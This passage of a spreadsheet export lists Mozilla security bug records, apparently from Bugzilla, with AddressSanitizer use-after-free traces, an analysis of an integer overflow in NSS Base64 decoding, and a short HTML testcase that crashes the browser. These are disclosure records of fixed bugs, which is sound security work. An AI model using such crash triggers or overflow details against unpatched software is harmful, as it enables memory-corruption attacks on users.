        <is>
          <t>mozilla49</t>
        </is>
      </c>
      <c r="T3975" t="n">
        <v>1</v>
      </c>
      <c r="U3975" t="n">
        <v>0</v>
      </c>
      <c r="V3975" t="n">
        <v>12</v>
      </c>
      <c r="W3975" t="inlineStr">
        <is>
          <t>https://cgit.freedesktop.org/cairo/commit/?id=71e8a4c23019b01aa43b334fcb2784c70daae9b5
https://bugs.freedesktop.org/show_bug.cgi?id=
pixman_image_t has virtual function pointers, making use after free serious, but triggering the race is likely difficult.</t>
        </is>
      </c>
      <c r="X3975" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3976">
      <c r="A3976" t="n">
        <v>771994</v>
      </c>
      <c r="B3976" t="inlineStr">
        <is>
          <t>2012-07-09 01:51:30 -0700</t>
        </is>
      </c>
      <c r="C3976" t="inlineStr">
        <is>
          <t>Heap-use-after-free in nsRangeUpdater::SelAdjDeleteNode</t>
        </is>
      </c>
      <c r="D3976" t="inlineStr">
        <is>
          <t>2024-05-29 16:02:18 -0700</t>
        </is>
      </c>
      <c r="E3976" t="n">
        <v>1</v>
      </c>
      <c r="F3976" t="n">
        <v>1</v>
      </c>
      <c r="G3976" t="n">
        <v>3</v>
      </c>
      <c r="H3976" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3976" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3976" t="inlineStr">
        <is>
          <t>DOM: Editor</t>
        </is>
      </c>
      <c r="K3976" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3976" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3976" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3976" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3976" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3976" t="inlineStr">
        <is>
          <t>[asan][advisory-tracking+][qa-]</t>
        </is>
      </c>
      <c r="Q3976" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3976" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3976" t="inlineStr">
        <is>
          <t>mozilla16</t>
        </is>
      </c>
      <c r="T3976" t="n">
        <v>1</v>
      </c>
      <c r="U3976" t="n">
        <v>0</v>
      </c>
      <c r="V3976" t="n">
        <v>30</v>
      </c>
      <c r="W3976" t="inlineStr">
        <is>
          <t>Reproduces on trunk, testcase coming soon. Below is a fully symbolized stack.
20120707214206
http://hg.mozilla.org/mozilla-central/rev/9533b40ff28b
=================================================================
==21914== ERROR: AddressSanitizer heap-use-after-free on address 0x7f4120fac130 at pc 0x7f414d5a0c33 bp 0x7fff10d82d30 sp 0x7fff10d82d28
READ of size 8 at 0x7f4120fac130 thread T0
    #0 0x7f414d5a0c33 in nsCOMPtr&lt;nsIDOMNode&gt;::get() const firefox/src/modules/zlib/src/inffast.c:0
    #1 0x7f41521a148e in nsRangeUpdater::SelAdjDeleteNode(nsIDOMNode*) firefox/src/editor/libeditor/base/nsSelectionState.cpp:271
    #2 0x7f41521d8818 in DeleteNodeTxn::DoTransaction() firefox/src/editor/libeditor/base/DeleteNodeTxn.cpp:74
    #3 0x7f41555503b9 in nsTransactionItem::DoTransaction() firefox/src/editor/txmgr/src/nsTransactionItem.cpp:178
    #4 0x7f4155574d8e in nsTransactionManager::BeginTransaction(nsITransaction*) firefox/src/editor/txmgr/src/nsTransactionManager.cpp:729
    #5 0x7f4155562d25 in nsTransactionManager::DoTransaction(nsITransaction*) firefox/src/editor/txmgr/src/nsTransactionManager.cpp:74
    #6 0x7f41520afcf3 in nsEditor::DoTransaction(nsITransaction*) firefox/src/editor/libeditor/base/nsEditor.cpp:689
    #7 0x7f41520cc7bd in nsEditor::DeleteNode(nsINode*) firefox/src/editor/libeditor/base/nsEditor.cpp:1492
    #8 0x7f41520cbe8b in nsEditor::DeleteNode(nsIDOMNode*) firefox/src/editor/libeditor/base/nsEditor.cpp:1476
    #9 0x7f41526457ee in nsHTMLEditor::DeleteNode(nsIDOMNode*) firefox/src/editor/libeditor/html/nsHTMLEditor.cpp:3226
    #10 0x7f4152082664 in nsTextEditRules::WillInsert(nsISelection*, bool*) firefox/src/editor/libeditor/text/nsTextEditRules.cpp:324
    #11 0x7f415274d1fc in nsHTMLEditRules::WillInsert(nsISelection*, bool*) firefox/src/editor/libeditor/html/nsHTMLEditRules.cpp:1171
    #12 0x7f41526ff9bc in nsHTMLEditRules::WillInsertText(nsEditor::OperationID, mozilla::Selection*, bool*, bool*, nsAString_internal const*, nsAString_internal*, int) firefox/src/editor/libeditor/html/nsHTMLEditRules.cpp:1264
    #13 0x7f41526fbd14 in nsHTMLEditRules::WillDoAction(mozilla::Selection*, nsRulesInfo*, bool*, bool*) firefox/src/editor/libeditor/html/nsHTMLEditRules.cpp:570
    #14 0x7f4152049777 in nsPlaintextEditor::InsertText(nsAString_internal const&amp;) firefox/src/editor/libeditor/text/nsPlaintextEditor.cpp:700
    #15 0x7f415204a2ef in non-virtual thunk to nsPlaintextEditor::InsertText(nsAString_internal const&amp;) firefox/src/modules/zlib/src/inffast.c:0
    #16 0x7f415216b714 in nsInsertPlaintextCommand::DoCommandParams(char const*, nsICommandParams*, nsISupports*) firefox/src/editor/libeditor/base/nsEditorCommands.cpp:834
    #17 0x7f41553ebcbc in nsControllerCommandTable::DoCommandParams(char const*, nsICommandParams*, nsISupports*) firefox/src/embedding/components/commandhandler/src/nsControllerCommandTable.cpp:175
    #18 0x7f41553be57f in nsBaseCommandController::DoCommandWithParams(char const*, nsICommandParams*) firefox/src/embedding/components/commandhandler/src/nsBaseCommandController.cpp:153
    #19 0x7f41553be8b7 in non-virtual thunk to nsBaseCommandController::DoCommandWithParams(char const*, nsICommandParams*) firefox/src/modules/zlib/src/inffast.c:0
    #20 0x7f41553d6061 in nsCommandManager::DoCommand(char const*, nsICommandParams*, nsIDOMWindow*) firefox/src/embedding/components/commandhandler/src/nsCommandManager.cpp:236
    #21 0x7f4150a232f4 in nsHTMLDocument::ExecCommand(nsAString_internal const&amp;, bool, nsAString_internal const&amp;, bool*) firefox/src/content/html/document/src/nsHTMLDocument.cpp:3218
    #22 0x7f4150a253ee in non-virtual thunk to nsHTMLDocument::ExecCommand(nsAString_internal const&amp;, bool, nsAString_internal const&amp;, bool*) firefox/src/modules/zlib/src/inffast.c:0
    #23 0x7f415880dbfa in NS_InvokeByIndex_P firefox/src/xpcom/reflect/xptcall/src/md/unix/xptcinvoke_x86_64_unix.cpp:161
    #24 0x7f4153f8a56b in CallMethodHelper::Call() firefox/src/js/xpconnect/src/XPCWrappedNative.cpp:2405
    #25 0x7f4153ff17d4 in XPC_WN_CallMethod(JSContext*, unsigned int, JS::Value*) firefox/src/js/xpconnect/src/XPCWrappedNativeJSOps.cpp:1474
    #26 0x7f415db3664d in js::CallJSNative(JSContext*, int (*)(JSContext*, unsigned int, JS::Value*), JS::CallArgs const&amp;) firefox/src/js/src/jscntxtinlines.h:400
    #27 0x7f415d4c9040 in js::Invoke(JSContext*, js::InvokeArgsGuard&amp;, js::MaybeConstruct) firefox/src/js/src/jsinterp.h:119
    #28 0x7f415db3bc0d in js::Invoke(JSContext*, JS::Value const&amp;, JS::Value const&amp;, unsigned int, JS::Value*, JS::Value*) firefox/src/js/src/jsinterp.cpp:382
    #29 0x7f415df7bef9 in js::IndirectProxyHandler::call(JSContext*, JSObject*, unsigned int, JS::Value*) firefox/src/js/src/jsproxy.cpp:441
    #30 0x7f415e71c5e1 in js::DirectWrapper::call(JSContext*, JSObject*, unsigned int, JS::Value*) firefox/src/js/src/jswrapper.cpp:303
    #31 0x7f415e731179 in js::CrossCompartmentWrapper::call(JSContext*, JSObject*, unsigned int, JS::Value*) firefox/src/js/src/jswrapper.cpp:699
    #32 0x7f415e731985 in non-virtual thunk to js::CrossCompartmentWrapper::call(JSContext*, JSObject*, unsigned int, JS::Value*) ??:0
    #33 0x7f415dfb13a1 in js::Proxy::call(JSContext*, JSObject*, unsigned int, JS::Value*) firefox/src/js/src/jsproxy.cpp:1134
    #34 0x7f415dfc9b2c in proxy_Call(JSContext*, unsigned int, JS::Value*) firefox/src/js/src/jsproxy.cpp:1657
    #35 0x7f415db361f5 in js::CallJSNative(JSContext*, int (*)(JSContext*, unsigned int, JS::Value*), JS::CallArgs const&amp;) firefox/src/js/src/jscntxtinlines.h:400
    #36 0x7f415daa9268 in js::Interpret(JSContext*, js::StackFrame*, js::InterpMode) firefox/src/js/src/jsinterp.cpp:2465
    #37 0x7f415da2d777 in js::RunScript(JSContext*, JSScript*, js::StackFrame*) firefox/src/js/src/jsinterp.cpp:299
    #38 0x7f415db434bd in js::ExecuteKernel(JSContext*, JSScript*, JSObject&amp;, JS::Value const&amp;, js::ExecuteType, js::StackFrame*, JS::Value*) firefox/src/js/src/jsinterp.cpp:482
    #39 0x7f415db451c0 in js::Execute(JSContext*, JSScript*, JSObject&amp;, JS::Value*) firefox/src/js/src/jsinterp.cpp:519
    #40 0x7f415d36b011 in EvaluateUCScriptForPrincipalsCommon(JSContext*, JSObject*, JSPrincipals*, JSPrincipals*, unsigned short const*, unsigned int, char const*, unsigned int, JS::Value*, JSVersion) firefox/src/js/src/jsapi.cpp:5370
    #41 0x7f415d36cf4c in JS_EvaluateUCScriptForPrincipalsVersionOrigin firefox/src/js/src/jsapi.cpp:5407
    #42 0x7f41511cf74f in nsJSContext::EvaluateString(nsAString_internal const&amp;, JSObject*, nsIPrincipal*, nsIPrincipal*, char const*, unsigned int, JSVersion, nsAString_internal*, bool*) firefox/src/dom/base/nsJSEnvironment.cpp:1466
    #43 0x7f415137eb5e in nsGlobalWindow::RunTimeoutHandler(nsTimeout*, nsIScriptContext*) firefox/src/dom/base/nsGlobalWindow.cpp:9519
    #44 0x7f4151333ee2 in nsGlobalWindow::RunTimeout(nsTimeout*) firefox/src/dom/base/nsGlobalWindow.cpp:9783
    #45 0x7f415137cd6b in nsGlobalWindow::TimerCallback(nsITimer*, void*) firefox/src/dom/base/nsGlobalWindow.cpp:10055
    #46 0x7f4158748a42 in nsTimerImpl::Fire() firefox/src/xpcom/threads/nsTimerImpl.cpp:474
    #47 0x7f415874a67c in nsTimerEvent::Run() firefox/src/xpcom/threads/nsTimerImpl.cpp:558
    #48 0x7f415870cccd in nsThread::ProcessNextEvent(bool, bool*) firefox/src/xpcom/threads/nsThread.cpp:625
    #49 0x7f415839c01d in NS_ProcessNextEvent_P(nsIThread*, bool) firefox/src/objdir-ff-asan-sym/xpcom/build/nsThreadUtils.cpp:217
    #50 0x7f415743d226 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) firefox/src/ipc/glue/MessagePump.cpp:82
    #51 0x7f41589c084a in MessageLoop::RunInternal() firefox/src/ipc/chromium/src/base/message_loop.cc:209
    #52 0x7f41589c0693 in MessageLoop::RunHandler() firefox/src/ipc/chromium/src/base/message_loop.cc:202
    #53 0x7f41589c0578 in MessageLoop::Run() firefox/src/ipc/chromium/src/base/message_loop.cc:176
    #54 0x7f415697542e in nsBaseAppShell::Run() firefox/src/widget/xpwidgets/nsBaseAppShell.cpp:165
    #55 0x7f41555c0668 in nsAppStartup::Run() firefox/src/toolkit/components/startup/nsAppStartup.cpp:257
    #56 0x7f414bdfd280 in XREMain::XRE_mainRun() firefox/src/toolkit/xre/nsAppRunner.cpp:3787
    #57 0x7f414be03c22 in XREMain::XRE_main(int, char**, nsXREAppData const*) firefox/src/toolkit/xre/nsAppRunner.cpp:3864
    #58 0x7f414be070f2 in XRE_main firefox/src/toolkit/xre/nsAppRunner.cpp:3940
    #59 0x40c28f in do_main(int, char**) firefox/src/browser/app/nsBrowserApp.cpp:160
    #60 0x409cbd in main firefox/src/browser/app/nsBrowserApp.cpp:330
    #61 0x7f4166a4fc4d in ?? ??:0
0x7f4120fac130 is located 176 bytes inside of 1120-byte region [0x7f4120fac080,0x7f4120fac4e0)
freed by thread T0 here:
    #0 0x4a4392 in free ??:0
    #1 0x7f41638dd5c3 in moz_free firefox/src/memory/mozalloc/mozalloc.cpp:49
    #2 0x7f41526d8516 in ~nsHTMLEditRules firefox/src/editor/libeditor/html/nsHTMLEditRules.cpp:198
    #3 0x7f415206b677 in nsTextEditRules::Release() firefox/src/editor/libeditor/text/nsTextEditRules.cpp:90
    #4 0x7f41526d8c34 in nsHTMLEditRules::Release() firefox/src/editor/libeditor/html/nsHTMLEditRules.cpp:205
    #5 0x7f414bdc7250 in ~nsCOMPtr_base firefox/src/../../dist/include/nsCOMPtr.h:408
    #6 0x7f4152067456 in nsCOMPtr&lt;nsIEditRules&gt;::~nsCOMPtr() firefox/src/../../../dist/include/nsCOMPtr.h:447
    #7 0x7f41520341a3 in nsCOMPtr&lt;nsIEditRules&gt;::~nsCOMPtr() firefox/src/../../../dist/include/nsCOMPtr.h:447
    #8 0x7f4152047fee in nsPlaintextEditor::DeleteSelection(short, short) firefox/src/editor/libeditor/text/nsPlaintextEditor.cpp:670
    #9 0x7f41521622b8 in nsDeleteCommand::DoCommand(char const*, nsISupports*) firefox/src/editor/libeditor/base/nsEditorCommands.cpp:585
    #10 0x7f41553eb40d in nsControllerCommandTable::DoCommand(char const*, nsISupports*) firefox/src/embedding/components/commandhandler/src/nsControllerCommandTable.cpp:158
    #11 0x7f41553bdd14 in nsBaseCommandController::DoCommand(char const*) firefox/src/embedding/components/commandhandler/src/nsBaseCommandController.cpp:137
    #12 0x7f41553d6151 in nsCommandManager::DoCommand(char const*, nsICommandParams*, nsIDOMWindow*) firefox/src/embedding/components/commandhandler/src/nsCommandManager.cpp:238
    #13 0x7f4150a22a7a in nsHTMLDocument::ExecCommand(nsAString_internal const&amp;, bool, nsAString_internal const&amp;, bool*) firefox/src/content/html/document/src/nsHTMLDocument.cpp:3200
    #14 0x7f4150a253ee in non-virtual thunk to nsHTMLDocument::ExecCommand(nsAString_internal const&amp;, bool, nsAString_internal const&amp;, bool*) firefox/src/modules/zlib/src/inffast.c:0
    #15 0x7f415880dbfa in NS_InvokeByIndex_P firefox/src/xpcom/reflect/xptcall/src/md/unix/xptcinvoke_x86_64_unix.cpp:161
    #16 0x7f4153f8a56b in CallMethodHelper::Call() firefox/src/js/xpconnect/src/XPCWrappedNative.cpp:2405
    #17 0x7f4153ff17d4 in XPC_WN_CallMethod(JSContext*, unsigned int, JS::Value*) firefox/src/js/xpconnect/src/XPCWrappedNativeJSOps.cpp:1474
    #18 0x7f415db3664d in js::CallJSNative(JSContext*, int (*)(JSContext*, unsigned int, JS::Value*), JS::CallArgs const&amp;) firefox/src/js/src/jscntxtinlines.h:400
    #19 0x7f415daa9268 in js::Interpret(JSContext*, js::StackFrame*, js::InterpMode) firefox/src/js/src/jsinterp.cpp:2465
    #20 0x7f415da2d777 in js::RunScript(JSContext*, JSScript*, js::StackFrame*) firefox/src/js/src/jsinterp.cpp:299
    #21 0x7f415db434bd in js::ExecuteKernel(JSContext*, JSScript*, JSObject&amp;, JS::Value const&amp;, js::ExecuteType, js::StackFrame*, JS::Value*) firefox/src/js/src/jsinterp.cpp:482
    #22 0x7f415db451c0 in js::Execute(JSContext*, JSScript*, JSObject&amp;, JS::Value*) firefox/src/js/src/jsinterp.cpp:519
    #23 0x7f415d36b011 in EvaluateUCScriptForPrincipalsCommon(JSContext*, JSObject*, JSPrincipals*, JSPrincipals*, unsigned short const*, unsigned int, char const*, unsigned int, JS::Value*, JSVersion) firefox/src/js/src/jsapi.cpp:5370
    #24 0x7f415d36cf4c in JS_EvaluateUCScriptForPrincipalsVersionOrigin firefox/src/js/src/jsapi.cpp:5407
    #25 0x7f41511cf74f in nsJSContext::EvaluateString(nsAString_internal const&amp;, JSObject*, nsIPrincipal*, nsIPrincipal*, char const*, unsigned int, JSVersion, nsAString_internal*, bool*) firefox/src/dom/base/nsJSEnvironment.cpp:1466
    #26 0x7f415137eb5e in nsGlobalWindow::RunTimeoutHandler(nsTimeout*, nsIScriptContext*) firefox/src/dom/base/nsGlobalWindow.cpp:9519
    #27 0x7f4151333ee2 in nsGlobalWindow::RunTimeout(nsTimeout*) firefox/src/dom/base/nsGlobalWindow.cpp:9783
    #28 0x7f415137cd6b in nsGlobalWindow::TimerCallback(nsITimer*, void*) firefox/src/dom/base/nsGlobalWindow.cpp:10055
    #29 0x7f4158748a42 in nsTimerImpl::Fire() firefox/src/xpcom/threads/nsTimerImpl.cpp:474
previously allocated by thread T0 here:
    #0 0x4a4452 in __interceptor_malloc ??:0
    #1 0x7f41638dd717 in moz_xmalloc firefox/src/memory/mozalloc/mozalloc.cpp:54
    #2 0x7f41525eab1b in nsHTMLEditor::InitRules() firefox/src/editor/libeditor/html/nsHTMLEditor.cpp:486
    #3 0x7f4152037a60 in nsPlaintextEditor::EndEditorInit() firefox/src/editor/libeditor/text/nsPlaintextEditor.cpp:186
    #4 0x7f41520689ce in ~nsAutoEditInitRulesTrigger firefox/src/editor/libeditor/text/nsTextEditUtils.cpp:85
    #5 0x7f41525e58b4 in nsHTMLEditor::Init(nsIDOMDocument*, nsIContent*, nsISelectionController*, unsigned int) firefox/src/editor/libeditor/html/nsHTMLEditor.cpp:287
    #6 0x7f4155babb31 in nsEditingSession::SetupEditorOnWindow(nsIDOMWindow*) firefox/src/editor/composer/src/nsEditingSession.cpp:459
    #7 0x7f4155ba124e in nsEditingSession::MakeWindowEditable(nsIDOMWindow*, char const*, bool, bool, bool) firefox/src/editor/composer/src/nsEditingSession.cpp:169
    #8 0x7f41509f2448 in nsHTMLDocument::EditingStateChanged() firefox/src/content/html/document/src/nsHTMLDocument.cpp:2679
    #9 0x7f4150a16e77 in nsHTMLDocument::MaybeEditingStateChanged() firefox/src/content/html/document/src/nsHTMLDocument.cpp:2326
    #10 0x7f4150a17648 in nsHTMLDocument::EndUpdate(unsigned int) firefox/src/content/html/document/src/nsHTMLDocument.cpp:2339
    #11 0x7f41524491b1 in nsHtml5TreeOpExecutor::EndDocUpdate() firefox/src/parser/html/nsHtml5TreeOpExecutor.h:265
    #12 0x7f41524487b7 in nsHtml5TreeOpExecutor::DidBuildModel(bool) firefox/src/parser/html/nsHtml5TreeOpExecutor.cpp:134
    #13 0x7f4152431d6f in nsHtml5TreeOperation::Perform(nsHtml5TreeOpExecutor*, nsIContent**) firefox/src/parser/html/nsHtml5TreeOperation.cpp:621
    #14 0x7f415244ca06 in nsHtml5TreeOpExecutor::RunFlushLoop() firefox/src/parser/html/nsHtml5TreeOpExecutor.cpp:566
    #15 0x7f41524889c6 in nsHtml5ExecutorFlusher::Run() firefox/src/parser/html/nsHtml5StreamParser.cpp:127
    #16 0x7f415870cccd in nsThread::ProcessNextEvent(bool, bool*) firefox/src/xpcom/threads/nsThread.cpp:625
    #17 0x7f415839c01d in NS_ProcessNextEvent_P(nsIThread*, bool) firefox/src/objdir-ff-asan-sym/xpcom/build/nsThreadUtils.cpp:217
    #18 0x7f415743d226 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) firefox/src/ipc/glue/MessagePump.cpp:82
    #19 0x7f41589c084a in MessageLoop::RunInternal() firefox/src/ipc/chromium/src/base/message_loop.cc:209
    #20 0x7f41589c0693 in MessageLoop::RunHandler() firefox/src/ipc/chromium/src/base/message_loop.cc:202
    #21 0x7f41589c0578 in MessageLoop::Run() firefox/src/ipc/chromium/src/base/message_loop.cc:176
    #22 0x7f415697542e in nsBaseAppShell::Run() firefox/src/widget/xpwidgets/nsBaseAppShell.cpp:165
    #23 0x7f41555c0668 in nsAppStartup::Run() firefox/src/toolkit/components/startup/nsAppStartup.cpp:257
    #24 0x7f414bdfd280 in XREMain::XRE_mainRun() firefox/src/toolkit/xre/nsAppRunner.cpp:3787
==21914== ABORTING
Stats: 233M malloced (294M for red zones) by 765806 calls
Stats: 59M realloced by 49108 calls
Stats: 192M freed by 507438 calls
Stats: 71M really freed by 191258 calls
Stats: 464M (118844 full pages) mmaped in 116 calls
  mmaps   by size class: 8:491490; 9:57337; 10:36855; 11:20470; 12:4096; 13:3584; 14:1792; 15:384; 16:640; 17:192; 18:208; 19:48; 20:16;
  mallocs by size class: 8:613146; 9:72863; 10:44103; 11:23815; 12:4500; 13:3975; 14:1770; 15:446; 16:685; 17:216; 18:228; 19:46; 20:13;
  frees   by size class: 8:377324; 9:59823; 10:40191; 11:20179; 12:3343; 13:3663; 14:1532; 15:386; 16:573; 17:196; 18:176; 19:42; 20:10;
  rfrees  by size class: 8:139644; 9:27360; 10:10215; 11:10492; 12:1071; 13:679; 14:1121; 15:194; 16:366; 17:75; 18:35; 19:5; 20:1;
Stats: malloc large: 503 small slow: 3318
Shadow byte and word:
  0x1fe8241f5826: fd
  0x1fe8241f5820: fd fd fd fd fd fd fd fd
More shadow bytes:
  0x1fe8241f5800: fa fa fa fa fa fa fa fa
  0x1fe8241f5808: fa fa fa fa fa fa fa fa
  0x1fe8241f5810: fd fd fd fd fd fd fd fd
  0x1fe8241f5818: fd fd fd fd fd fd fd fd
=&gt;0x1fe8241f5820: fd fd fd fd fd fd fd fd
  0x1fe8241f5828: fd fd fd fd fd fd fd fd
  0x1fe8241f5830: fd fd fd fd fd fd fd fd
  0x1fe8241f5838: fd fd fd fd fd fd fd fd
  0x1fe8241f5840: fd fd fd fd fd fd fd fd</t>
        </is>
      </c>
      <c r="X3976" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3977">
      <c r="A3977" t="n">
        <v>1344380</v>
      </c>
      <c r="B3977" t="inlineStr">
        <is>
          <t>2017-03-03 14:12:54 -0800</t>
        </is>
      </c>
      <c r="C3977" t="inlineStr">
        <is>
          <t>Write beyond bounds caused by bugs in Base64 de/encoding in nssb64d.c and nssb64e.c</t>
        </is>
      </c>
      <c r="D3977" t="inlineStr">
        <is>
          <t>2024-05-30 09:29:58 -0700</t>
        </is>
      </c>
      <c r="E3977" t="n">
        <v>1</v>
      </c>
      <c r="F3977" t="n">
        <v>1</v>
      </c>
      <c r="G3977" t="n">
        <v>3</v>
      </c>
      <c r="H3977" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3977" t="inlineStr">
        <is>
          <t>NSS</t>
        </is>
      </c>
      <c r="J3977" t="inlineStr">
        <is>
          <t>Libraries</t>
        </is>
      </c>
      <c r="K3977" t="inlineStr">
        <is>
          <t>trunk</t>
        </is>
      </c>
      <c r="L3977" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3977" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3977" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3977" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3977" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main53+][adv-esr45.9+][adv-esr52.1+]</t>
        </is>
      </c>
      <c r="Q3977" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3977" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3977" t="inlineStr">
        <is>
          <t>3.31</t>
        </is>
      </c>
      <c r="T3977" t="n">
        <v>1</v>
      </c>
      <c r="U3977" t="n">
        <v>0</v>
      </c>
      <c r="V3977" t="n">
        <v>25</v>
      </c>
      <c r="W3977" t="inlineStr">
        <is>
          <t>PL_Base64MaxDecodedLength() (security\nss\lib\util\nssb64d.c) can cause an integer overflow. If it does, its caller(s) will allocate a buffer too small for the result of a Base64 decoding operation, then possibly overrun it.
For example, PL_Base64DecodeBuffer() (security\nss\lib\util\nssb64d.c) uses the result of PL_Base64MaxDecodedLength() to check whether a caller-provided buffer is long enough, or to allocate a buffer if the caller does not provide one. In either case, the calculated length is inadequate if the length of the encoded string is &gt;= 0x55555556. Once it has calculated the (potentially incorrect) length, it passes it and the corresponding buffer to pl_base64_decode_buffer() (same module) to do the decoding. That function incrementally checks against the provided length (data-&gt;output_buflen) but (another bug!) *only in debug builds (i.e. via a PR_ASSERT())*.
The upshot is that PL_Base64DecodeBuffer() might be vulnerable to the same kind of buffer overrun bug as in https://bugzilla.mozilla.org/show_bug.cgi?id=1344081 : an attack that overruns a heap buffer, by an attacker-determined amount, with 3-byte granularity.
There is a similar issue in PL_Base64MaxEncodedLength() and its associated functions for Base64 encoding.
I will try to manifest these bugs and post a POC if and when I do.
The bugs are in lines 373 and 254 (nssb64d.c):
370: static PRUint32
371: PL_Base64MaxDecodedLength (PRUint32 size)
372: {
373:     return ((size * 3) / 4);
374: }
219: static PRStatus
220: pl_base64_decode_buffer (PLBase64Decoder *data, const unsigned char *in,
221: 			 PRUint32 length)
222: {
223:     unsigned char *out = data-&gt;output_buffer;
224:     unsigned char *token = data-&gt;token;
225:     int i, n = 0;
226: 
227:     i = data-&gt;token_size;
228:     data-&gt;token_size = 0;
229: 
230:     while (length &gt; 0) {
231: 	while (i &lt; 4 &amp;&amp; length &gt; 0) {
...
254: 	   PR_ASSERT((out - data-&gt;output_buffer + 3) &lt;= data-&gt;output_buflen);
and 288 and potentially 300 (nssb64e.c):
280: static PRUint32
281: PL_Base64MaxEncodedLength (PRUint32 size, PRUint32 line_length)
282: {
283:     PRUint32 tokens, tokens_per_line, full_lines, line_break_chars, remainder;
284: 
285:     tokens = (size + 2) / 3;
286: 
287:     if (line_length == 0)
288: 	      return tokens * 4;
289: 
290:     if (line_length &lt; 4)	/* too small! */
291: 	      line_length = 4;
292: 
293:     tokens_per_line = line_length / 4;
294:     full_lines = tokens / tokens_per_line;
295:     remainder = (tokens - (full_lines * tokens_per_line)) * 4;
296:     line_break_chars = full_lines * 2;
297:     if (remainder == 0)
298: 	   line_break_chars -= 2;
299: 
300:     return (full_lines * tokens_per_line * 4) + line_break_chars + remainder;
301: }</t>
        </is>
      </c>
      <c r="X3977" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3978">
      <c r="A3978" t="n">
        <v>1811939</v>
      </c>
      <c r="B3978" t="inlineStr">
        <is>
          <t>2023-01-23 12:54:13 -0800</t>
        </is>
      </c>
      <c r="C3978" t="inlineStr">
        <is>
          <t>Heap-use-after-free in mozilla::dom::ScriptLoadContext::~ScriptLoadContext</t>
        </is>
      </c>
      <c r="D3978" t="inlineStr">
        <is>
          <t>2024-05-30 11:04:29 -0700</t>
        </is>
      </c>
      <c r="E3978" t="n">
        <v>1</v>
      </c>
      <c r="F3978" t="n">
        <v>1</v>
      </c>
      <c r="G3978" t="n">
        <v>3</v>
      </c>
      <c r="H3978" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3978" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3978" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K3978" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3978" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3978" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3978" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3978" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3978" t="inlineStr">
        <is>
          <t>[adv-main110+][adv-esr102.8+]</t>
        </is>
      </c>
      <c r="Q3978" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3978" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S3978" t="inlineStr">
        <is>
          <t>111 Branch</t>
        </is>
      </c>
      <c r="T3978" t="n">
        <v>1</v>
      </c>
      <c r="U3978" t="n">
        <v>0</v>
      </c>
      <c r="V3978" t="n">
        <v>22</v>
      </c>
      <c r="W3978" t="inlineStr">
        <is>
          <t>Created attachment 9313667
asan_log.txt
After a few seconds the following testcase triggers a heap-use-after-free 
with a current asan build of firefox (product_version = 20230123-52f9e6382dce, installed via fuzzfetch --central -a).
```
&lt;script&gt;
    import("data:text/javascript,0").catch(x =&gt; 0);
    import("data:text/javascript,0").catch(x =&gt; 0);
    window.stop();
&lt;/script&gt;
```
```
==2398430==ERROR: AddressSanitizer: heap-use-after-free on address 0x61400000b640 at pc 0x7facd4b345e3 bp 0x7ffd70bfa260 sp 0x7ffd70bfa258
READ of size 8 at 0x61400000b640 thread T0 (file:// Content)
    #0 0x7facd4b345e2 in Release /builds/worker/workspace/obj-build/dist/include/mozilla/RefPtr.h:50:40
    #1 0x7facd4b345e2 in Release /builds/worker/workspace/obj-build/dist/include/mozilla/RefPtr.h:381:36
    #2 0x7facd4b345e2 in assign_assuming_AddRef /builds/worker/workspace/obj-build/dist/include/mozilla/RefPtr.h:69:7
    #3 0x7facd4b345e2 in operator= /builds/worker/workspace/obj-build/dist/include/mozilla/RefPtr.h:168:5
    #4 0x7facd4b345e2 in mozilla::dom::ScriptLoadContext::~ScriptLoadContext() /builds/worker/checkouts/gecko/dom/script/ScriptLoadContext.cpp:77:12
    #5 0x7facd4b346ad in mozilla::dom::ScriptLoadContext::~ScriptLoadContext() /builds/worker/checkouts/gecko/dom/script/ScriptLoadContext.cpp:71:41
...
```
The testcase seems similar to the testcases of Bug 1291535 and Bug 1529203,  maybe the issues are related.</t>
        </is>
      </c>
      <c r="X3978" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3979">
      <c r="A3979" t="n">
        <v>810298</v>
      </c>
      <c r="B3979" t="inlineStr">
        <is>
          <t>2012-11-09 07:09:43 -0800</t>
        </is>
      </c>
      <c r="C3979" t="inlineStr">
        <is>
          <t>re-push Socorro 25 to prod</t>
        </is>
      </c>
